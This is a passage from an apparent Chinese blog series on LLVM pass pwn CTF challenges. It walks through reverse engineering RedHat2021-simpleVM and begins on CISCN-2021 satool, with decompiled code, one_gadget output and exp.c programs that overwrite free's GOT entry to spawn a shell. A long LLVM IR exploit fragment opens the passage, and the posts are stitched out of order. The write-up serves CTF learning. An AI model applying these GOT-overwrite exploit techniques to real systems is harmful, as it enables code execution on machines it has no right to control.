  %309 = add nsw i64 %308, 256
  %310 = add nsw i64 %309, 256
  %311 = add nsw i64 %310, 256
  %312 = add nsw i64 %311, 256
  %313 = add nsw i64 %312, 256
  %314 = add nsw i64 %313, 1
  %315 = add nsw i64 %314, 1
  %316 = add nsw i64 %315, 1
  %317 = add nsw i64 %316, 256
  ret i64 %317
}

define dso_local i64 @test2(i64 %0) #0 {
  %2 = sub nsw i64 %0, 1
  %3 = add nsw i64 %2, 1
  %4 = add nsw i64 %3, 1
  %5 = add nsw i64 %4, 16999840169015142506
  %6 = add nsw i64 %5, 16999840042827329464
  %7 = add nsw i64 %6, 16999840167141359944
  %8 = add nsw i64 %7, 16999802617337939272
  %9 = add nsw i64 %8, 16999840169015152720
  %10 = add nsw i64 %9, 16999840169020852552
  %11 = add nsw i64 %10, 16999839548121314152
  %12 = add nsw i64 %11, 16999840169015178801
  %13 = add nsw i64 %12, 16999840169015152726
  %14 = add nsw i64 %13, 16999840169015117930
  %15 = add nsw i64 %14, 16999840169015152734
  %16 = add nsw i64 %15, 16999840169020752200
  %17 = add nsw i64 %16, 16999840169015152726
  %18 = add nsw i64 %17, 16999840169020787016
  %19 = add nsw i64 %18, 16999840169015169585
  %20 = add nsw i64 %19, 16999840169015130986
  %21 = add nsw i64 %20, 16999840169015152728
  %22 = add nsw i64 %21, 16999840169015117071
  %23 = add nsw i64 %22, 256
  %24 = add nsw i64 %23, 256
  %25 = add nsw i64 %24, 256
  %26 = add nsw i64 %25, 256
  %27 = add nsw i64 %26, 256
  %28 = add nsw i64 %27, 256
  %29 = add nsw i64 %28, 256
  %30 = add nsw i64 %29, 256
  %31 = add nsw i64 %30, 256
  %32 = add nsw i64 %31, 256
  %33 = add nsw i64 %32, 256
  %34 = add nsw i64 %33, 256
  %35 = add nsw i64 %34, 256
  %36 = add nsw i64 %35, 256
  %37 = add nsw i64 %36, 256
  %38 = add nsw i64 %37, 256
  %39 = add nsw i64 %38, 256
  %40 = add nsw i64 %39, 256
  %41 = add nsw i64 %40, 256
  %42 = add nsw i64 %41, 256
  %43 = add nsw i64 %42, 256
  %44 = add nsw i64 %43, 256
  %45 = add nsw i64 %44, 256
  %46 = add nsw i64 %45, 256
  %47 = add nsw i64 %46, 256
  %48 = add nsw i64 %47, 256
  %49 = add nsw i64 %48, 256
  %50 = add nsw i64 %49, 256
  %51 = add nsw i64 %50, 256
  %52 = add nsw i64 %51, 256
  %53 = add nsw i64 %52, 256
  %54 = add nsw i64 %53, 256
  %55 = add nsw i64 %54, 256
  %56 = add nsw i64 %55, 256
  %57 = add nsw i64 %56, 256
  %58 = add nsw i64 %57, 256
  %59 = add nsw i64 %58, 256
  %60 = add nsw i64 %59, 256
  %61 = add nsw i64 %60, 256
  %62 = add nsw i64 %61, 256
  %63 = add nsw i64 %62, 256
  %64 = add nsw i64 %63, 256
  %65 = add nsw i64 %64, 256
  %66 = add nsw i64 %65, 256
  %67 = add nsw i64 %66, 256
  %68 = add nsw i64 %67, 256
  %69 = add nsw i64 %68, 256
  %70 = add nsw i64 %69, 256
  %71 = add nsw i64 %70, 256
  %72 = add nsw i64 %71, 256
  %73 = add nsw i64 %72, 256
  %74 = add nsw i64 %73, 256
  %75 = add nsw i64 %74, 256
  %76 = add nsw i64 %75, 256
  %77 = add nsw i64 %76, 256
  %78 = add nsw i64 %77, 256
  %79 = add nsw i64 %78, 256
  %80 = add nsw i64 %79, 256
  %81 = add nsw i64 %80, 256
  %82 = add nsw i64 %81, 256
  %83 = add nsw i64 %82, 256
  %84 = add nsw i64 %83, 256
  %85 = add nsw i64 %84, 256
  %86 = add nsw i64 %85, 256
  %87 = add nsw i64 %86, 256
  %88 = add nsw i64 %87, 256
  %89 = add nsw i64 %88, 256
  %90 = add nsw i64 %89, 256
  %91 = add nsw i64 %90, 256
  %92 = add nsw i64 %91, 256
  %93 = add nsw i64 %92, 256
  %94 = add nsw i64 %93, 256
  %95 = add nsw i64 %94, 256
  %96 = add nsw i64 %95, 256
  %97 = add nsw i64 %96, 256
  %98 = add nsw i64 %97, 256
  %99 = add nsw i64 %98, 256
  %100 = add nsw i64 %99, 256
  %101 = add nsw i64 %100, 256
  %102 = add nsw i64 %101, 256
  %103 = add nsw i64 %102, 256
  %104 = add nsw i64 %103, 256
  %105 = add nsw i64 %104, 256
  %106 = add nsw i64 %105, 256
  %107 = add nsw i64 %106, 256
  %108 = add nsw i64 %107, 256
  %109 = add nsw i64 %108, 256
  %110 = add nsw i64 %109, 256
  %111 = add nsw i64 %110, 256
  %112 = add nsw i64 %111, 256
  %113 = add nsw i64 %112, 256
  %114 = add nsw i64 %113, 256
  %115 = add nsw i64 %114, 256
  %116 = add nsw i64 %115, 256
  %117 = add nsw i64 %116, 256
  %118 = add nsw i64 %117, 256
  %119 = add nsw i64 %118, 256
  %120 = add nsw i64 %119, 256
  %121 = add nsw i64 %120, 256
  %122 = add nsw i64 %121, 256
  %123 = add nsw i64 %122, 256
  %124 = add nsw i64 %123, 256
  %125 = add nsw i64 %124, 256
  %126 = add nsw i64 %125, 256
  %127 = add nsw i64 %126, 256
  %128 = add nsw i64 %127, 256
  %129 = add nsw i64 %128, 256
  %130 = add nsw i64 %129, 256
  %131 = add nsw i64 %130, 256
  %132 = add nsw i64 %131, 256
  %133 = add nsw i64 %132, 256
  %134 = add nsw i64 %133, 256
  %135 = add nsw i64 %134, 256
  %136 = add nsw i64 %135, 256
  %137 = add nsw i64 %136, 256
  %138 = add nsw i64 %137, 256
  %139 = add nsw i64 %138, 256
  %140 = add nsw i64 %139, 256
  %141 = add nsw i64 %140, 256
  %142 = add nsw i64 %141, 256
  %143 = add nsw i64 %142, 256
  %144 = add nsw i64 %143, 256
  %145 = add nsw i64 %144, 256
  %146 = add nsw i64 %145, 256
  %147 = add nsw i64 %146, 256
  %148 = add nsw i64 %147, 256
  %149 = add nsw i64 %148, 256
  %150 = add nsw i64 %149, 256
  %151 = add nsw i64 %150, 256
  %152 = add nsw i64 %151, 256
  %153 = add nsw i64 %152, 256
  %154 = add nsw i64 %153, 256
  %155 = add nsw i64 %154, 256
  %156 = add nsw i64 %155, 256
  %157 = add nsw i64 %156, 256
  %158 = add nsw i64 %157, 256
  %159 = add nsw i64 %158, 256
  %160 = add nsw i64 %159, 256
  %161 = add nsw i64 %160, 256
  %162 = add nsw i64 %161, 256
  %163 = add nsw i64 %162, 256
  %164 = add nsw i64 %163, 256
  %165 = add nsw i64 %164, 256
  %166 = add nsw i64 %165, 256
  %167 = add nsw i64 %166, 256
  %168 = add nsw i64 %167, 256
  %169 = add nsw i64 %168, 256
  %170 = add nsw i64 %169, 256
  %171 = add nsw i64 %170, 256
  %172 = add nsw i64 %171, 256
  %173 = add nsw i64 %172, 256
  %174 = add nsw i64 %173, 256
  %175 = add nsw i64 %174, 256
  %176 = add nsw i64 %175, 256
  %177 = add nsw i64 %176, 256
  %178 = add nsw i64 %177, 256
  %179 = add nsw i64 %178, 256
  %180 = add nsw i64 %179, 256
  %181 = add nsw i64 %180, 256
  %182 = add nsw i64 %181, 256
  %183 = add nsw i64 %182, 256
  %184 = add nsw i64 %183, 256
  %185 = add nsw i64 %184, 256
  %186 = add nsw i64 %185, 256
  %187 = add nsw i64 %186, 256
  %188 = add nsw i64 %187, 256
  %189 = add nsw i64 %188, 256
  %190 = add nsw i64 %189, 256
  %191 = add nsw i64 %190, 256
  %192 = add nsw i64 %191, 256
  %193 = add nsw i64 %192, 256
  %194 = add nsw i64 %193, 256
  %195 = add nsw i64 %194, 256
  %196 = add nsw i64 %195, 256
  %197 = add nsw i64 %196, 256
  %198 = add nsw i64 %197, 256
  %199 = add nsw i64 %198, 256
  %200 = add nsw i64 %199, 256
  %201 = add nsw i64 %200, 256
  %202 = add nsw i64 %201, 256
  %203 = add nsw i64 %202, 256
  %204 = add nsw i64 %203, 256
  %205 = add nsw i64 %204, 256
  %206 = add nsw i64 %205, 256
  %207 = add nsw i64 %206, 256
  %208 = add nsw i64 %207, 256
  %209 = add nsw i64 %208, 256
  %210 = add nsw i64 %209, 256
  %211 = add nsw i64 %210, 256
  %212 = add nsw i64 %211, 256
  %213 = add nsw i64 %212, 256
  %214 = add nsw i64 %213, 256
  %215 = add nsw i64 %214, 256
  %216 = add nsw i64 %215, 256
  %217 = add nsw i64 %216, 256
  %218 = add nsw i64 %217, 256
  %219 = add nsw i64 %218, 256
  %220 = add nsw i64 %219, 256
  %221 = add nsw i64 %220, 256
  %222 = add nsw i64 %221, 256
  %223 = add nsw i64 %222, 256
  %224 = add nsw i64 %223, 256
  %225 = add nsw i64 %224, 256
  %226 = add nsw i64 %225, 256
  %227 = add nsw i64 %226, 256
  %228 = add nsw i64 %227, 256
  %229 = add nsw i64 %228, 256
  %230 = add nsw i64 %229, 256
  %231 = add nsw i64 %230, 256
  %232 = add nsw i64 %231, 256
  %233 = add nsw i64 %232, 256
  %234 = add nsw i64 %233, 256
  %235 = add nsw i64 %234, 256
  %236 = add nsw i64 %235, 256
  %237 = add nsw i64 %236, 256
  %238 = add nsw i64 %237, 256
  %239 = add nsw i64 %238, 256
  %240 = add nsw i64 %239, 256
  %241 = add nsw i64 %240, 256
  %242 = add nsw i64 %241, 256
  %243 = add nsw i64 %242, 256
  %244 = add nsw i64 %243, 256
  %245 = add nsw i64 %244, 256
  %246 = add nsw i64 %245, 256
  %247 = add nsw i64 %246, 256
  %248 = add nsw i64 %247, 256
  %249 = add nsw i64 %248, 256
  %250 = add nsw i64 %249, 256
  %251 = add nsw i64 %250, 256
  %252 = add nsw i64 %251, 256
  %253 = add nsw i64 %252, 256
  %254 = add nsw i64 %253, 256
  %255 = add nsw i64 %254, 256
  %256 = add nsw i64 %255, 256
  %257 = add nsw i64 %256, 256
  %258 = add nsw i64 %257, 256
  %259 = add nsw i64 %258, 256
  %260 = add nsw i64 %259, 256
  %261 = add nsw i64 %260, 256
  %262 = add nsw i64 %261, 256
  %263 = add nsw i64 %262, 256
  %264 = add nsw i64 %263, 256
  %265 = add nsw i64 %264, 256
  %266 = add nsw i64 %265, 256
  %267 = add nsw i64 %266, 256
  %268 = add nsw i64 %267, 256
  %269 = add nsw i64 %268, 256
  %270 = add nsw i64 %269, 256
  %271 = add nsw i64 %270, 256
  %272 = add nsw i64 %271, 256
  %273 = add nsw i64 %272, 256
  %274 = add nsw i64 %273, 256
  %275 = add nsw i64 %274, 256
  %276 = add nsw i64 %275, 256
  %277 = add nsw i64 %276, 256
  %278 = add nsw i64 %277, 256
  %279 = add nsw i64 %278, 256
  %280 = add nsw i64 %279, 256
  %281 = add nsw i64 %280, 256
  %282 = add nsw i64 %281, 256
  %283 = add nsw i64 %282, 256
  %284 = add nsw i64 %283, 256
  %285 = add nsw i64 %284, 256
  %286 = add nsw i64 %285, 256
  %287 = add nsw i64 %286, 256
  %288 = add nsw i64 %287, 256
  %289 = add nsw i64 %288, 256
  %290 = add nsw i64 %289, 256
  %291 = add nsw i64 %290, 256
  %292 = add nsw i64 %291, 256
  %293 = add nsw i64 %292, 256
  %294 = add nsw i64 %293, 256
  %295 = add nsw i64 %294, 256
  %296 = add nsw i64 %295, 256
  %297 = add nsw i64 %296, 256
  %298 = add nsw i64 %297, 256
  %299 = add nsw i64 %298, 256
  %300 = add nsw i64 %299, 256
  %301 = add nsw i64 %300, 256
  %302 = add nsw i64 %301, 256
  %303 = add nsw i64 %302, 256
  %304 = add nsw i64 %303, 256
  %305 = add nsw i64 %304, 256
  %306 = add nsw i64 %305, 256
  %307 = add nsw i64 %306, 256
  %308 = add nsw i64 %307, 256
  %309 = add nsw i64 %308, 256
  %310 = add nsw i64 %309, 256
  %311 = add nsw i64 %310, 256
  %312 = add nsw i64 %311, 256
  %313 = add nsw i64 %312, 256
  %314 = add nsw i64 %313, 1
  %315 = add nsw i64 %314, 1
  %316 = add nsw i64 %315, 1
  %317 = add nsw i64 %316, 256
  %318 = add nsw i64 %317, 256
  %319 = add nsw i64 %318, 256
  ret i64 %319
}

attributes #0 = { noinline nounwind optnone uwtable "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="true" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "tune-cpu"="generic" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"Ubuntu clang version 12.0.0-3ubuntu1~20.04.5"}

本题的漏洞点在于代码执行。在做题的时候，要特别注意动态代码执行部分，这个部分往往就是漏洞产生的地方。

LLVM pass pwn 入门 (3)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， llvm pass pwn 系列
本文字数： 7.6k 阅读时长 ≈ 7 分钟

这篇文章中我们来分析一下红帽杯2021-simpleVM这道题，由于和上一道题相比这道题相对更加简单些，读者可以在阅读本文之前实操一下，遇到困难时再通过本文找到答案，这样能够更好地提升我们的做题实践能力。（本题的附件可以在Github上找到，在笔者的Github中也有保存）

RedHat2021-simpleVM

首先还是使用IDA打开，找到了几个没有名字的函数：

Step 1: 找到runOnFunction函数

如果读者还记得上一篇文章的方法，这一步应该来说不难想到。我们是通过IDA汇编界面中对函数的交叉引用情况进行判断的，如果这个函数没有数据段的交叉引用，那么它一定不是runOnFunction函数，因为这是一个覆写的函数，其地址会被保存到vtable结构体中。根据这种方法，我们可以找到多个函数：

LOAD:0000000000006780 sub_6780        proc near               ; CODE XREF: sub_67D0+24↓p
LOAD:0000000000006780                                         ; DATA XREF: LOAD:off_20DD20↓o
...
LOAD:00000000000067D0 sub_67D0        proc near               ; DATA XREF: LOAD:000000000020DD28↓o
...
LOAD:0000000000006830 sub_6830        proc near               ; DATA XREF: LOAD:000000000020DDA8↓o

其中我们打开前两个函数，发现都是一些删除和调用析构函数的操作，因此这一定不是runOnFunction函数的覆写。故runOnFunction应该是sub_6830函数。

__int64 __fastcall runOnFunction(__int64 a1, llvm::Value *a2)
{
  __int64 v2; // rdx
  bool v4; // [rsp+7h] [rbp-119h]
  size_t v5; // [rsp+10h] [rbp-110h]
  const void *Name; // [rsp+28h] [rbp-F8h]
  __int64 v7; // [rsp+30h] [rbp-F0h]
  int v8; // [rsp+94h] [rbp-8Ch]

  Name = (const void *)llvm::Value::getName(a2);
  v7 = v2;
  if ( "o0o0o0o0" )
    v5 = strlen("o0o0o0o0");
  else
    v5 = 0LL;
  v4 = 0;
  if ( v7 == v5 )
  {
    if ( v5 )
      v8 = memcmp(Name, "o0o0o0o0", v5);
    else
      v8 = 0;
    v4 = v8 == 0;
  }
  if ( v4 )
    sub_6AC0(a1, a2);
  return 0LL;
}

Step 2: 分析runOnFunction函数

上面的代码就是反汇编出来的runOnFunction函数，和上一篇文章国赛题眼花缭乱的代码段相比，还是友好了不少的，代码的逻辑清晰可见。

首先使用了getName函数获取了Value对象的名字，这里其遍历的是函数名，笔者分享一种看代码的方法：从后往前，执果索因。我们可以看到最后三行是如果v4不等于0就执行sub_6AC0函数，否则就返回。在runOnFunction函数中我们没有发现任何有关于内存空间改动的函数，只有一个strlen和memcmp函数用于进行内存操作，但这两个函数都并不会对内存中对应地址的值产生任何变化。因此漏洞点一定不在runOnFunction函数，需要执行到sub_6A70函数。那也就意味着v4不能等于0。前面的代码中，唯一能让v4可能不等于0的语句就是v4=v8==0。注意这条语句的意思是如果v8==0那么v4=1。看一下汇编代码就可以知道：

这里使用了一个setz指令，它的含义是当标志寄存器中的ZF位为1时，将al的值设为1。因此，我们需要让v8==0才行。不难发现，v8==0的条件就是函数名等于"o0o0o0o0"。因此这个LLVM pass只会对名为"o0o0o0o0"的函数进行一些操作。我们再来到sub_6A70函数看一下执行了什么操作。

Step 3: 分析sub_6AC0函数

下面就是sub_6AC0函数的内容：

unsigned __int64 __fastcall sub_6AC0(__int64 a1, llvm::Function *a2)
{
  llvm::BasicBlock *v3; // [rsp+20h] [rbp-30h]
  __int64 v4; // [rsp+38h] [rbp-18h] BYREF
  __int64 v5[2]; // [rsp+40h] [rbp-10h] BYREF

  v5[1] = __readfsqword(0x28u);
  v5[0] = llvm::Function::begin(a2);
  while ( 1 )
  {
    v4 = llvm::Function::end(a2);
    if ( (llvm::operator!=(v5, &v4) & 1) == 0 )
      break;
    v3 = (llvm::BasicBlock *)llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator*(v5);
    sub_6B80(a1, v3);
    llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator++(
      v5,
      0LL);
  }
  return __readfsqword(0x28u);
}

这里的llvm::Function::begin和llvm::Function::end都是Function类的迭代器对象，其迭代的对象是函数中的基本块。因此这个循环的意思就是对每一个基本块执行sub_6B80函数。其中v3 = (llvm::BasicBlock *)llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator*(v5);这条语句中的ilist是LLVM标准库中定义的一个数据结构，与C++标准模板库list类似，但是LLVM中都是使用ilist来存储一个函数的所有基本块或指令，可以将其看成一个列表，针对于LLVM做了一些特殊的优化。那么v3也就是函数中的每一个基本块。我们需要进入sub_6B80函数看一下对这些基本块又进行了什么操作。

Step 4: 分析sub_6B80函数

这个函数是主要操作，比较长，我们一点点来看。

Segment 1

这一段中可以看到，使用了一个大循环，是对基本块进行遍历。这里的v36变量是从v39变量dyn_cast过来的，这是一个llvm定义的类型转换，不用去管。这里是将v36转换成了Instruction指令对象，然后获取了这个指令的指令码getOpcode(v36)。这个指令码的定义笔者找资料找了好久都没有找到，最终查看源码才发现其定义保存在llvm/IR/Instruction.def文件中，上面的代码意思是指令码需要为55才能进入下一步操作，否则就会直接跳过这个指令去处理下一条指令。我们看一下llvm/IR/Instruction.def文件中哪个指令的指令码是55：

1	HANDLE_OTHER_INST(55, Call, CallInst)

即Call指令的指令码为55。如果查看上一篇文章中生成的.ll文件就可以发现，函数调用就是用Call指令来表示的。也即o0o0o0o0函数中的所有代码都要是函数调用，其他的代码写了也不会处理。

由此我们可以猜测出v35变量的CallBase指针类型实际上也就是函数调用的对象。源码中的注释说，CallBase对象是所有可以调用的指令的基类，这里“可以调用的指令”包含InvokeInst和CallInst。所有调用的指令都含有：调用的函数自身、零或若干个参数、零或若干个操作数组以及零或若干个操作数输入 （原文是operand bundle，笔者不确定这里指的是不是数组的意思，如有错误还请读者指正）

下面的getCalledFunction就是获取函数本身，将函数名拷贝到了变量s1中，下面判断函数名是否是pop，如果是判断getNumOperands()函数的结果是不是2。这里需要注意的是，getNumOperands()函数并不是返回函数参数的个数，而是返回一条指令中的变量个数。注意这里的v35变量类型是CallBase，是指令Instructions的子类，与CalledFunction变量的类型完全不同。随便截取一段.ll文件的代码可以看到call后面会跟上变量名，变量名之前加上@符号说明llvm将其认为是一个变量。因此在这里其实际返回的值应该是函数参数的个数+1。

Segmant 2

之后我们进入分析当函数名为pop时进行了何种处理。后面的一些变量笔者重命名了一下，读者可以自己打开IDA对照一下。

pop函数的参数个数应该是1。之后进入内部调用了getArgOperand函数，这个函数是用来返回被调用的函数的第一个实参的值，然后v31变量赋值为这个值，并以ConstantInt即整型常量的类型保存。如果这个值不为0，那么再次进行转换，getZExtValue这个函数我们在上一篇文章中见过类似的函数，通过函数名猜测其功能：get Zero Extended Value，即无符号扩展整数。其为1或2时v32变量指向两段内存的地址，这两段内存分别被命名为reg1和reg2。后面又将v3变量赋值为某段内存的二重指针（因为stackdoubleptr变量保存的是一个指针指向内存空间，因此这里表示其为二重指针）。那一段内存空间被命名为stack。hmmm，这样看起来程序中有一个小的vm，有虚拟出来的寄存器和栈，算是和vm题很像了。而且这里的操作也和汇编的pop指令完全相同，将栈顶的值赋值给reg1或reg2，然后栈指针下移8。因此这个vm中栈底在低地址，而栈顶在高地址，与汇编中的栈排列相反。

现在我们知道了这里可能是一个vm，那么分析后面的条件判断就会快上很多了。

Segment 3

下面一个条件判断判断函数名是否是push，想都不用想这一定是入栈操作，将两个寄存器中的一个的值压入栈中，然后栈指针上移。

Segment 4

当函数名为store时，注意最后的4行代码，出现了指针操作。其将一个寄存器看成指针，将这个地址保存的值拷贝到另外一个地址，这个地址就是另外一个寄存器指定的地址的地址（二重指针）。很明显这里我们可以将任意地址保存到这两个寄存器中。

Segment 5

当函数名为load时，操作与store类似，但要注意拷贝的方向。store和load函数一定会是我们pwn的重点，至于具体应该如何去pwn，待下面进行调试时再去探索。

Segment 6

add函数加法操作，有两个参数。第一个参数指定寄存器，第二个参数是要加到这个寄存器上的数值。这个函数对于我们的pwn也是有很大意义的。可以构造任意地址。

Segment 7

min函数减法操作，有2个参数，第一个参数指定寄存器，第二个参数是要减去的数值。

至此，源码已经全部分析完毕。我们已经可以在exp中编写6个函数的原型了，注意参数的类型和个数。

void o0o0o0o0();
void pop(int reg){};
void push(int reg){};
void store(int reg){};
void load(int reg){};
void add(int reg1, int reg2){};
void min(int reg1, int reg2){};

void o0o0o0o0(){
	
}

Step 5: 编写exp.c，同时进行调试

现在，我们来着手编写exp，重点需要调试load和store这两个函数的执行。

一开始，reg1、reg2、stack中所有的值都为0，由于本题中opt-8程序没有开启PIE保护，因此其加载基址固定不变，我们可以利用这个获取到其got表中的地址，将其拷贝到reg或stack中。然后在此基础上计算出one_gadget的地址，将其写回到got表，即可执行one_gadget，逻辑很简单。

在这里，我们选择free函数作为地址覆盖的对象，找到opt程序中free函数got表的位置为0x77E100。因此o0o0o0o0函数的第一条语句应该是：add(1, 0x77E100);。然后使用load函数将got表中地址值保存到另一个寄存器中：load(1);。现在我们想要的地址在reg2中，加上相应的one_gadget偏移。与上一题相同，这里使用的是笔者虚拟机的libc而不是题目给的libc：

root@ubuntu:~/Desktop/LLVM/challenges/RedHat2021-simpleVM# one_gadget /lib/x86_64-linux-gnu/libc.so.6
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

找到free函数偏移：

root@ubuntu:~/Desktop/LLVM/challenges/RedHat2021-simpleVM# python3
Python 3.8.10 (default, Jun 22 2022, 20:18:18) 
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
>>> print(hex(libc.symbols['free']))
0x9a6d0
>>>

因此，第三条语句应该是add(2, 0x4942e);，这样就得到了第一个one_gadget的地址。第四条语句将其写回到free.got中：store(1);，完成，我们连stack都没有用到。

exp：

void o0o0o0o0();
void pop(int reg){};
void push(int reg){};
void store(int reg){};
void load(int reg){};
void add(int reg, int val){};
void min(int reg, int val){};

void o0o0o0o0(){
	add(1, 0x77E100);
	load(1);
	add(2, 0x4942e);
	store(1);
}

尝试运行，发现3个one_gadget都不行，应该是one_gadget的条件不满足。因此考虑写入system函数的地址，然后创建一个名为sh的函数，看看能不能执行到system(“sh”)。system函数的libc偏移为0x52290。

exp：

void o0o0o0o0();
void pop(int reg){};
void push(int reg){};
void store(int reg){};
void load(int reg){};
void add(int reg, int val){};
void min(int reg, int val){};

void o0o0o0o0(){
	add(1, 0x77E100);
	load(1);
	add(2, 0x52290);
	store(1);
}

void sh(){};

可惜，还是不行。使用原来的libc应该是可以跑one_gadget的，因为有两个one_gadget的条件是栈中某处为0，相对来说更容易满足一些。笔者尝试通过追踪函数调用链获取到VMPass.so的加载基址，但发现VMPass.so的runOnFunction函数是通过call寄存器的方式调用的，目前尚无思路。不过这道题本身还是不难理解的，能够做到修改one_gadget就已经足够了。

下一篇文章笔者将会分析今年（2022）国赛题的satool，看一下和去年的同名题有什么区别。

LLVM pass pwn 入门 (2)

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， llvm pass pwn 系列
本文字数： 19k 阅读时长 ≈ 18 分钟

本文来分析几道题目，熟悉下LLVM pass pwn的解题流程。

CISCN-2021 satool

国赛题，2022年也出了一道名字都一样的题，可见国赛还是很重视这类题型的。

这一题的附件很难找，笔者将其放在了自己的github中，便于读者复现。

首先当然是使用IDA打开。发现符号表被抠了，不过我们还是有定位runOnFunction的方法。
需要注意的是，题目中给的runOnFunction函数是覆写的llvm库中的runOnFunction方法，因此其一定会被vtable表引用，而vtable表在.rodata段中，只需要调到IDA-view界面查看名字未知的函数中哪一个有足够的长度，而且被.rodata段引用即可。

发现红框中的两个函数都有足够的长度，但是只有sub_19D0被.rodata段引用，因此判定这就是覆写的runOnFunction方法了。

由于我们有llvm的所有头文件源码，因此对于.so文件中llvm方法的调用，我们都可以找到相应的声明，有助于我们理解代码本身。

1. 逆向分析

首先进行的是两个条件判断，这里判断rdx是否为8，函数的返回值是否等于该字符串的值。经过调试发现，上面的函数getName()的返回值是llvm::value对象的名字。需要注意的是，llvm::value是llvm中最重要的一个类，其可以代表一个常量、变量、指令或函数。这里可以看到如果对象的名字不是B4ckDo0r，则会直接退出不作处理。要想进行下面的处理，我们就必须要让一个函数的名字为B4ckDo0r。至于前面对rdx的判断，这应该也算是getName()函数的返回值，其表示的是对象名字的长度。显而易见，B4ckDo0r的长度为8，因此这里判断长度是否为8合情合理。

注：这里说明一下llvm pass类题目如何调试。

我们需要通过opt程序加载.so链接库，同时输入.ll文件以生成IR输出，因此应该调试opt这个程序（带参数的opt调试方式：gdb opt、r 参数, 参数,...），我们可以先对opt下一个在main开头的断点，保证其在一开始执行就能够中断，注意此时.so链接库并未被加载到内存中，本题的opt程序中在main函数有一堆函数调用，快速步过后经过某一条call指令可以发现.so库被加载，此时再下链接库的断点，继续执行就可以让程序断在我们想要调试的runOnFunction()函数了。这种方式是笔者自己探索出来的，比较麻烦，但由于这方面的资料实在太少，找不到现成的参考，只能先这样做了。如有更加简便的方法还请读者不吝赐教。

前面我们知道了只有名为B4ckDo0r的函数才能被优化，后面的代码错综复杂，手动地去一步步分析显然是不太现实的，我们重点关注一下程序中提到的字符串，看能不能找到一些流程控制的线索。

(line 175) if ( !(unsigned int)str_compare(&p_dest, "save") )
(line 300) if ( (unsigned int)str_compare(&p_dest, "takeaway") )
(line 444) if ( !(unsigned int)str_compare(&p_dest, "stealkey") )
(line 469) if ( !(unsigned int)str_compare(&p_dest, "fakekey") )
(line 517) if ( !(unsigned int)str_compare(&p_dest, "fakekey") )

我们很容易能够找到上面的几行语句，这里的save、takeaway等字符串显然是突破的关键所在。

经过调试发现，这里的&p_dest指的是函数中操作符的名字，如第一条语句调用printf函数时，操作符名即为printf。因此我们不仅要保证其函数名为B4ckDo0r，还要保证其中调用的函数名为上面五个字符串中的一个。

在save控制流程中，我们发现了这些代码，通过字符串可以猜测出这应该是报错信息，对于使用C语言程序正常生成的.ll文件，应该不会有这样的问题出现。因此在下面凡是看到跳转到这些label的代码，就统统都可以不看了，能够节省很多时间。

剔除掉这些检查的代码之后，我们发现真正对我们有用的代码实际上也就这么几行。

// save
            v31 = n;
            v32 = malloc(0x18uLL);
            v32[2] = byte_2040f8;
            byte_2040f8 = v32;
            v33 = (char *)src;
            memcpy(v32, src, v31);
            v34 = v32 + 1;
            v35 = (char *)v84[0];
            memcpy(v34, v84[0], (size_t)v84[1]);
            if ( v35 != &v85 )
            {
              operator delete(v35);
              v33 = (char *)src;
            }
            if ( v33 != v88 )
              operator delete(v33);
// stealkey
          v66 = llvm::CallBase::getNumTotalBundleOperands((llvm::CallBase *)(v6 - 24));
          if ( byte_2040f8
            && !(-1431655765
               * (unsigned int)((v15
                               + 24 * v65
                               - 24LL * v66
                               - (v8
                                - 24 * (unsigned __int64)(*(_DWORD *)(v8 + 20) & 0xFFFFFFF))) >> 3)) )
          {
            byte_204100 = *byte_2040f8;
          }
// fakekey
              v76 = byte_204100;
              if ( *(_BYTE *)(*(_QWORD *)v75 + 16LL) == 13 )
                SExtValue = llvm::APInt::getSExtValue((llvm::APInt *)(*(_QWORD *)v75 + 24LL));
              else
                SExtValue = 0LL;
              byte_204100 = v76 + SExtValue;
              *byte_2040f8 = v76 + SExtValue;
// run
          if ( !(-1431655765
               * (unsigned int)((v15
                               + 24 * v80
                               - 24LL
                               * (unsigned int)llvm::CallBase::getNumTotalBundleOperands((llvm::CallBase *)(v6 - 24))
                               - (v8
                                - 24 * (unsigned __int64)(*(_DWORD *)(v8 + 20) & 0xFFFFFFF))) >> 3)) )
            ((void (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))*byte_2040f8)(
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL,
              0LL);
        }
        if ( p_dest != &dest )
          operator delete(p_dest);
        v7 = v83;

